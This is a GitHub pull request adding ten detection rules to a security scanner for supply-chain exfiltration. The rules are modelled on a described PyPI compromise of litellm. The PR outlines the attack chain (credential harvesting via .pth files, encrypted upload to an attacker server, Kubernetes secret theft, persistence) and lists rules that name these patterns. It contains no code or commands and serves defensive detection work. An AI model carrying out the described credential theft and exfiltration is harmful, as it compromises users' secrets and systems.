Skip to content

feat: 10 supply-chain exfiltration rules (litellm attack)#38

Merged
garagon merged 1 commit intomainfrom
feature/supply-chain-exfil-rules
Mar 24, 2026
Merged

feat: 10 supply-chain exfiltration rules (litellm attack)#38
garagon merged 1 commit intomainfrom
feature/supply-chain-exfil-rules

Conversation

@garagon
Copy link
Copy Markdown
Owner

@garagon garagon commented Mar 24, 2026

Summary

10 new detection rules for supply-chain exfiltration attacks, derived from the litellm supply chain compromise (March 24, 2026).

New category: supply-chain-exfil. New file: internal/rules/builtin/supply-chain-exfil.yaml.

The litellm attack

litellm v1.82.7/1.82.8 were published to PyPI with malicious .pth files that:

  1. Harvest SSH keys, cloud credentials, K8s configs, shell history, crypto wallets
  2. Encrypt with hardcoded RSA public key (AES-256-CBC)
  3. POST encrypted tar archive to attacker server
  4. Read all K8s secrets, create privileged pods on every node
  5. Install systemd persistence

Why existing rules didn't catch it

Existing supply-chain rules focus on setup.py execution, download-and-execute, and reverse shells. The litellm attack uses clean Python to read local files and POST via HTTPS - no shell commands, no downloads.

New rules

Rule Severity Description
SC-EX-001 CRITICAL Credential file read in Python (SSH, cloud, wallets)
SC-EX-002 CRITICAL File encoding for exfiltration (base64, AES, RSA)
SC-EX-003 CRITICAL Bulk os.environ collection + HTTP send
SC-EX-004 CRITICAL .pth file with executable content
SC-EX-005 HIGH Cloud metadata endpoint access in Python
SC-EX-006 CRITICAL K8s secrets API access / privileged pods
SC-EX-007 CRITICAL Systemd/cron persistence installation
SC-EX-008 HIGH Hardcoded cryptographic key material
SC-EX-009 CRITICAL Archive creation + HTTP POST
SC-EX-010 MEDIUM .pth file presence (review flag)

187 total rules (was 177). 560 tests, 0 lint issues.

Test plan

  • All 10 SC-EX rule self-tests pass (true positives match, false positives don't)
  • All 187 rule self-tests pass
  • Integration test TestIntegrationBenignSecurityTooling passes (no FPs on security tools)
  • Full make build && make test && make vet && make lint passes
  • 560 tests, 0 lint issues

@garagon
feat: add 10 supply-chain exfiltration rules (SC-EX-001 to SC-EX-010)
3e93177 
New category: supply-chain-exfil. Derived from the litellm supply chain
attack (March 24, 2026) where compromised PyPI packages harvested
credentials via .pth files, encrypted with RSA, and exfiltrated via HTTPS.

Rules detect:
- Credential file reads in Python (SSH keys, cloud configs, wallets)
- File content encoding for exfiltration (base64, AES, RSA)
- Bulk os.environ collection with network send
- .pth files with executable content
- Cloud metadata endpoint access in Python
- Kubernetes secrets API access and privileged pod creation
- Systemd/cron persistence installation
- Hardcoded cryptographic key material
- Tar/zip archive creation combined with HTTP POST
- .pth file presence with non-path content

187 total rules (was 177). All 560 tests pass, 0 lint issues.
@garagon garagon merged commit 06c5da4 into main Mar 24, 2026
1 check passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@garagon